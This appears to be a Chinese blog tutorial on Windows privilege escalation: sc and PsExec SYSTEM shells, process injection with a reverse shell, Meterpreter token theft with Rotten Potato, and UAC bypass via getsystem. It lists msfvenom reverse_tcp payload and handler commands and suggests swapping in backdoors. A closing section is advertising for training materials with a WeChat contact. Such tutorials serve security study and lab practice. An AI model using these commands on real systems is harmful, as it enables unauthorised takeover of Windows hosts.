windows2003 sc提权
Windows的sc
指令是 用于与服务控制管理器和服务进行通信的命令行程序。它允许用户创建、查询、启动、停止、配置和删除Windows服务。
创建一个名叫 syscmd的新的交互式的 cmd执行服务 sc Create syscmd binPath= “cmd /K start” type= own type= interact 运行服务 sc start syscmd也可以将普通的用户权限提升到system 原理就是使用sc创建了一个system权限的bash程序,然后后运行这个程序结果结果就是以bash命令打开了一个命令框
PsExec/PsWxexc64.exe提权
PsExec.exe 是一个 Windows 命令行工具,用于在远程系统上执行命令或运行程序。它是 Sysinternals Suite 的一部分,由 Mark Russinovich 和 Bryce Harrington 开发。PsExec 可以在本地或远程计算机上执行命令,而无需手动登录到远程计算机。它支持多种身份验证方法,包括用户名/密码、Kerberos、NTLM 等。
步骤:
我们将这个程序放到目标主机上,使用cmd命令去执行这个程序
PsExec.exe -accepteula -s -i -d cmd
执行这个目录之后就会出现一个system权限的命令窗口
调出一个system权限的命令框
这个提权使用与windowsservice服务器2003 2008 2016都试用,但是有可能会出现权限拒绝的情况
这个程序时windows自带的,不会出现被查杀的情况,在实战中可以将cmd程序改为后门程序,那么我们的后门程序就会以system的权限去执行,那么我们获取到的权限就是system权限
进程迁移提权
在windows2008以前可以使用工具pinjector进行操作
在对方的主机上安装pinjector.exe程序,找到是以系统权限执行的程序
使用pinjector.exe -l来获取程序的权限
在本地监听3333端口就可以反弹shell权限是system高权限
令牌窃取
当用户在Windows系统上登录时,系统会创建一个访问令牌。这个访问令牌包含了用户的安全标识(SID)以及用户和其所属安全组被赋予的权限列表。这些信息用于确定用户可以访问哪些资源以及可以执行哪些操作。
具体来说,访问令牌的作用包括:
- 身份验证:系统通过比对用户密码和安全数据库中的信息来验证用户的身份。
- 授权:令牌中的权限信息决定了用户可以执行哪些操作,以及能够访问哪些系统资源。
- 所有权:Windows使用访问令牌来确定正在运行的进程的所有权。这意味着系统可以知道哪个用户启动了特定的进程。
getuid查看当前用户
load incognito加载对应程序
使用impersonate_token “当前计算机用户名”
最后权限提升成功
因为主机的用户本来就是高权限的用户所以提权结果还是原来那个用户,但回显结果是成功了的
烂土豆配合实现权限提升
本地环境有问题,参考这篇文章windows权限提升——烂土豆+dll劫持+引号路径&+服务权限_windows server 限制dll作用权限-CSDN博客
过程: 上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功
1、假设通过漏洞将大马文件传到了目标web网站,并成功访问,如下图所示,成功获取了一个web权限
2、在kali上用以下命令生成一个后门,并上传到目标服务器。
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe -o shell.exe
3、kali上 msf 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
exploit
4、假设将 shell.exe 后门通过之前的漏洞传到上传到目标靶机并点击CMD 执行后门程序
5、kali 监听到会话,是web普通权限
6、尝试用烂土豆配合令牌窃取提权,假设通过漏洞将烂土豆上传到目标服务器的C盘
然后执行以下命令,成功提权。
cd C:\
execute -cH -f ./potato.exe
use incognito # 进入incognito
list_tokens -u # 列出令牌
impersonate_token “NT AUTHORITY\SYSTEM” # 令牌假冒 SYSTEM
MSF实现passUAC绕过
如果对方开了uac的话我们在对方的服务器上执行程序可能就会受到限制,为此,我们可以使用一些手段进行绕过uac的检测
用户账户控制 (User Account Control) 是Windows Vista (及更高版本操作系统)通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。
查看uac
设置不同的,计算机会对于windows操作设置时进行弹窗提醒
目标主机的UAC权限设置为最低
使用msfvenom选择windows模块设置IP端口生成木马,将木马放到目标主机上,在攻击机上使用msfconsole模块进行监听,在目标主机上执行后门,上线,绕过对方将uac的安全等级放置最低我们可以直接使用getsystem进行提权,就可以获取主机的system权限
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
里加入程序员的圈子,让我们一起学习成长!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算